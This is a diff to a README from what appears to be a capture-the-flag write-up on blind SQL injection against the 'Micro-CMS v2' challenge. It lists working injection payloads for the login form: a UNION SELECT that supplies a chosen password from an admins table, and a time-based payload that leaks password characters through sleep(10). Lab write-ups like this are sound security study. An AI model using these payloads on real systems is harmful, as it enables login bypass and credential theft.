TheCyberDiver/Micro-CMS-v2-Blind-SQLi/README.md

     Other Avenues for exploiting VIA TIME BASED AND UNION SELECT:
     NOTE: Union Select will be used for another flag
     ~~~
-    Payload: ' OR (UNION SELECT NULL#) // This also doesn't give us an error but adding a second NULL value errors
+    Payload1: ' OR (UNION SELECT NULL#) // This also doesn't give us an error but adding a second NULL value errors
+    Payload2: ' UNION SELECT 'abc' AS password FROM admins#

-    Payload: ' OR (SELECT CASE WHEN SUBSTRING(password,1,1)='k' THEN sleep(10) ELSE 1=2 END)# //induces sleep if
+    Payload1: ' OR (SELECT CASE WHEN SUBSTRING(password,1,1)='k' THEN sleep(10) ELSE 1=2 END)# //induces sleep if
     condition is true.
 This would be better if the default login creds message was standard
     ~~~